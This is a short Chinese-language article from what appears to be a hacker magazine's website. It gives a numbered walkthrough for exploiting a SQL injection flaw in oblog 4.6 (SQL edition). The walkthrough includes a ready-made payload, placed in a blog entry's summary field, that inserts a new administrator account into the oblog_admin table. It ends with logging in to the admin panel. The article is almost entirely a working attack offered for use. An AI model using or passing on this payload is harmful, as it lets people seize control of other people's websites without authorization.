黑客防线,在攻与防的对立统一中寻求突破!2001年创刊的黑客技术专业刊物!

设为首页
收藏本站
联系我们
网站导航


黑客文章 - 数据库注入 - 浏览 - oblog4.6添加后台管理员漏洞(仅适用于sql版)
oblog4.6添加后台管理员漏洞(仅适用于sql版)
http://www.hacker.com.cn/ 2008-9-12 0:24:16
oblog4.6添加后台管理员漏洞(仅适用于sql版)

1、注册一个用户,用户名script,密码123456
2、发布一篇日志,日志标题:测试一下
3、个人前台首页找到日志"测试一下",点"推荐"
4、个人后台管理,选择"常用"选项中的"推荐日志",然后点"测试一下"日志后面的修改,把摘要内容修改成:s'/**/WHERE/** /logid=1;insert/**/into/**/oblog_admin/**/(username,password,roleid)values('script','49ba59abbe56e057',0);--
5、最后点"确认提交"按钮,如果提示修改成功,注入完成!
6、登录后台,地址/admin/admin_login.asp,输入上面的用户名和密码,登录后台成功!
所属分类: 数据库注入   所属专题:
共有 332 人次浏览 收藏本页 返回上一页
评论作者:
电子邮件:
评论内容:
投票评价:
验 证 码:
图片包含4个随机字符,点击刷新
请输入上面图片中的随机字符